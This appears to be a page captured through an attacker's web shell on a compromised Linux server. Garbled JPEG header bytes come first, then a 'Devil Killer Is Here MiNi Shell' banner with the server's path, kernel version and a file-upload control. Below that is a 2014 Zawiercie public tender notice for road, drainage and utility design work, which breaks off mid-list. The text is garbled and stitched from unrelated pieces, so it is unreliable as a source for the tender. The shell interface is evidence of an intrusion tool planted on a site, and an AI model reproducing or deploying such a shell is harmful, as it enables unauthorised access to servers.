JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140923/315616-N-2014.html

<p class="kh_header"><b>Zawiercie: Przedmiotem zamówienia jest wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla 3 zadań</b><br>
<b>Numer ogłoszenia: 315616 - 2014; data zamieszczenia: 23.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla 3 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla:
Zadanie nr 1 - Przebudowa łącznika ul. Wiśniowieckiego z ul. Krzywą  (wzdłuż Potoku Łośnickiego) wraz z odwodnieniem, odcinkiem kanału sanitarnego, odcinkiem sieci wodociągowej oraz przebudowa drogi - budowa chodników i brakujących wjazdów do posesji w ul. Wiśniowieckiego na 	odcinku od ul. Andersa do mostu nad Potokiem Łośnickim, w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa.
Zadanie nr 2 - Przebudowa ulicy Żwirowej wraz z odwodnieniem w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa.
Zadanie nr 3 - Rozbudowa parkingu przy drodze wewnętrznej bocznej od ul. Paderewskiego przed budynkiem nr 45 przy ul. Paderewskiego, w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa.
Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami:
1) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 .r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. nr 202, poz. 2072 z późn. zm.). 
2) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych programie funkcjonalno - użytkowym (Dz.U. z 2004 r. nr 130, poz. 1389).
Wymagania dotyczące zadania nr 1, 2 i 3.
1.Wykonawca, przenosi na Zamawiającego autorskie prawa majątkowe do przedmiotu niniejszej zamówienia. 
2.Wykonawca zgadza się na wykonanie przez Zamawiającego autorskich praw zależnych. 
3.Zamawiający ma prawo do:
utrwalenia przedmiotu zamówienia, 
zwielokrotnienia przedmiotu zamówienia lub jego części dowolną techniką, 
zapisu przedmiotu zamówienia w formie elektronicznej, 
wykorzystania przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego, którego przedmiotem będzie wybór wykonawcy robót budowlanych, w szczególności poprzez włączenie przedmiotu zamówienia lub jego części do Specyfikacji Istotnych Warunków Zamówienia oraz udostępnianie przedmiotu zamówienia i jego części wszystkim zainteresowanym tym postępowaniem, 
używania i sporządzania kopii (techniką kserograficzną i cyfrową oraz na nośnikach magnetycznych typu dyskietki, CD) ,
wykorzystania przedmiotu niniejszej zamówienia, w celu realizacji inwestycji. 
4.Wykonawca udziela na przedmiot zamówienia rękojmi i gwarancji na okres 5 lat.
5.Wykonawca w trakcie wykonywania umowy może powierzyć wykonanie części zamówienia podwykonawcom, na podstawie umowy o podwykonawstwo w rozumieniu art. 2 pkt 9b ustawy Prawo zamówień publicznych, mimo niewskazania w ofercie takiej części do powierzenia podwykonawcom.
6.Jeżeli zmiana lub rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust.2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1, wykonawca jest zobowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
7.Dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych winne być wykonana przez osoby posiadające odpowiednie uprawnienia budowlane do projektowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 4 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)	Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT;
2)	Przekształcenia podmiotowego Wykonawcy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2  42-400 Zawiercie , Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2014 godzina 12:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2
Punkt Informacyjny (parter UM)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin realizacji zamówienia:
Zadanie nr 1 - od daty zawarcia umowy do 22.12.2014r.
Zadanie nr 2 - od daty zawarcia umowy do 22.12.2014r.
Zadanie nr 3 - od daty zawarcia umowy do 22.12.2014r.
Ogłoszenie o zamówieniu zostało zamieszczone w BZP w dniu 23/09/2014..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonanie dokumentacji projektowej, STWiORB oraz kosztorysu inwestorskiego dla:Przebudowa łącznika ul. Wiśniowieckiego z ul. Krzywą  (wzdłuż Potoku Łośnickiego) wraz z odwodnieniem, odcinkiem kanału sanitarnego, odcinkiem sieci wodociągowej oraz przebudowa drogi - budowa chodników i brakujących wjazdów do posesji w ul. Wiśniowieckiego na 	odcinku od ul. Andersa do mostu nad Potokiem Łośnickim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu  zamówienia:
Przedmiotem zamówienia jest: wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego:
- przebudowy odcinka jezdni o długości ok. 100 mb wraz z kanałem deszczowym o długości ok. 80mb, budowy chodników dwustronnych o długości ok. 300mb wraz z brakującymi wjazdami do posesji;
- budowy odcinka kanału sanitarnego o długości ok. 50mb wraz z jednym przyłączem do granicy działki;
- budowy odcinka sieci wodociągowej o długości ok.65mb wraz z dwoma przyłączami do dwóch działek budowlanych;
- przebudowy kolidujących słupów telekomunikacyjnych z projektowanymi chodnikami;  - inwentaryzacji drzew do wycinki o ile taka konieczność nastąpi.  
Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami:
1) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 .r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. nr 202, poz. 2072 z późn. zm.). 
2) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych programie funkcjonalno - użytkowym (Dz.U. z 2004 r. nr 130, poz. 1389).
1.	Dokumentacja powinna zawierać:
1)	projekt budowlany branży drogowej wraz z odwodnieniem w 6 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej,
2)	projekt wykonawczy w 3 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej,
3)	przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania,  wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczenie i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w § od 6 do 10 w/w rozporządzenia w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
4)	kosztorys inwestorski w  2 egzemplarzach  w wersji papierowej, 1 egz. w wersji elektronicznej,
5)	specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w  3 egzemplarzach   w wersji papierowej, 1 egz. w wersji elektronicznej,
6)	projekt czasowej organizacji ruchu w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
7)	projekt stałej organizacji ruchu w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
8)	mapa do celów projektowych  w 8 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
9)	projekt badania podłoża gruntowego wraz z opinią hydrogeologiczną w 3 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
Wykonanie odrębnego projektu odcinka kanalizacji sanitarnej i odcinka sieci wodociągowej.
W skład przedmiotowej dokumentacji wchodzi wykonanie :
1)	projekt budowlany w 6 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej,
2)	projekt wykonawczy w 3 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej,
3)	przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania,  wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczenie i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w § od 6 do 10 w/w rozporządzenia w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
4)	kosztorys inwestorski w  2 egzemplarzach  w wersji papierowej, 1 egz. w wersji elektronicznej,
5)	specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w  3 egzemplarzach   w wersji papierowej, 1 egz. w wersji elektronicznej,
6)	projekt czasowej organizacji ruchu w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej.
Wykonanie odrębnego projektu przebudowy słupów telekomunikacyjnych. 
W skład przedmiotowej dokumentacji wchodzi wykonanie :
1)	projekt budowlany w 6 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej,
2)	projekt wykonawczy w 3 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej,
3)	przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie
 przewidywanych do wykonania robót w kolejności technologicznej ich wykonania,  wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczenie i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w § od 6 do 10 w/w rozporządzenia w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
4)	kosztorys inwestorski w  2 egzemplarzach  w wersji papierowej, 1 egz. w wersji elektronicznej,
5)	specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w  3 egzemplarzach   w wersji papierowej, 1 egz. w wersji elektronicznej,
2.	W przypadku wystąpienia kolizji z istniejącymi sieciami podziemnymi i nadziemnym do obowiązków Wykonawcy należy opracowanie projektu zabezpieczenia sieci lub usunięcia kolizji. Szczegółowe rozwiązania winny być zgodne z warunkami technicznymi gestorów sieci, po akceptacji Zamawiającego. Uzyskanie warunków technicznych należy do obowiązków wykonawcy projektu. Dokumentację wykonać w ilościach jak określono powyżej.                                                         
3.	Stan istniejący:
Ulica Wiśniowieckiego posiada jezdnię o nawierzchni asfaltowej o długości ok. 400,00 mb i szerokości 6,00mb. i 5,50mb.   
Na odcinku od ul. Andersa do wysokości Potoku Łośnickiego widnieją przy ulicy dwustronne chodniki z kostki brukowej na długości ok. 30,00mb.
Na pozostałym odcinku ok. 300 mb. pomiędzy jezdnią a ogrodzeniem posesji widnieją obustronne pasy zieleni, w których wcześniej wykonano wjazdy do posesji z kostki brukowej. Od mostku na Potoku Łośnickim do ulicy Krzywej - odcinek ok. 100 mb pomiędzy istniejącym ogrodzeniem a Potokiem Łośnickim z drugiej strony, znajduje się wąski pas drogowy, którego nawierzchnia utwardzona jest kruszywem z hałdy hutniczej . Aktualnie nawierzchnia ta jest w bardzo złym stanie technicznym - pełno dziur drogowych i wybojów.
4.	Projekt czasowej organizacji ruchu - winien uzyskać pozytywną opinię Powiatowego Zarządu Dróg w Zawierciu. 
5.	Projekt stałej organizacji ruchu - winien uzyskać pozytywną opinię Komendy Miejskiej Policji i Powiatowego Zarządu Dróg w Zawierciu ( nie zatwierdzać projektu w PZD ).
6.	Dokumentacja winna uwzględniać
 - Budowę dwustronnych chodników o szerokości średnio 1,6m usytuowanych w miarę możliwości przy granicy pasa drogowego (przy ogrodzeniach) z kostki brukowej koloru szarego z elementami urozmaicania z kostki czerwonej o powierzchni od 15%  do 25% ogólnej powierzchni chodników;
- Budowę  brakujących wjazdów do posesji z kostki brukowej koloru czarnego;
- Zabudowę pasów zieleni pomiędzy krawężnikiem i chodnikiem;
- Budowę nowego odcinka jezdni wzdłuż Potoku Łośnickiego o nawierzchni bitumicznej o długości ok. 100 mb;
Z uwagi na bardzo wąski pas drogowy oraz skarpę Potoku sugeruje się zaprojektowanie od strony Potoku Łośnickiego muru oporowego, który umożliwi wykonanie jezdni o ruchu dwukierunkowym oraz pozwoli na dostosowanie z grubsza niwelety jezdni do poziomu ulicy Krzywej oraz poziomu terenu przyległych działek do projektowanego odcinka jezdni. Od strony Potoku winny być zabudowane typowe bariery drogowe. Wskazane byłoby także zaprojektowane opaski o szer. 0,5mb wzdłuż jezdni o ile pozwoli na to szerokość pasa drogowego.                                                                                                   
- Projekt inwentaryzacji ewentualnej wycinki drzew wraz z zestawieniem gatunku, ilości oraz podaniem obwodu drzewa na wys. 1,3m;
- Projekt kanału deszczowego łącznika ul. Wiśniowieckiego z ul. Krzywą z odprowadzeniem wód do istniejącego kanału w ul. Wiśniowieckiego - projekt wykonać łącznie z projektem drogowym;  - Projekt przebudowy słupów telekomunikacyjnych kolidujących z projektowanymi chodnikami;  - Projekt badania podłoża gruntowego uwzględniającą opinię hydrogeologiczną, która określi możliwość odprowadzenia wód deszczowych i roztopowych do gruntu; - Projekt odcinka kanału sanitarnego z przyłączem do jednej działki z odprowadzeniem ścieków do istniejącej kanalizacji sanitarnej w ulicy Wiśniowieckiego wraz z odcinkiem sieci wodociągowej od ulicy Wiśniowieckiego do dwóch działek budowlanych położonych przy projektowanym odcinku jezdni; - Komplet niezbędnych uzgodnień każdego projektu z właścicielami mediów:  TAURON, RPWiK Zawiercie, Orange, PGNiG - Oddział w Zawierciu i GAZ - SYSTEM Świerklany, ZUD, które umożliwią zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na budowę.
7.	Ponadto do obowiązków Wykonawcy należy: 
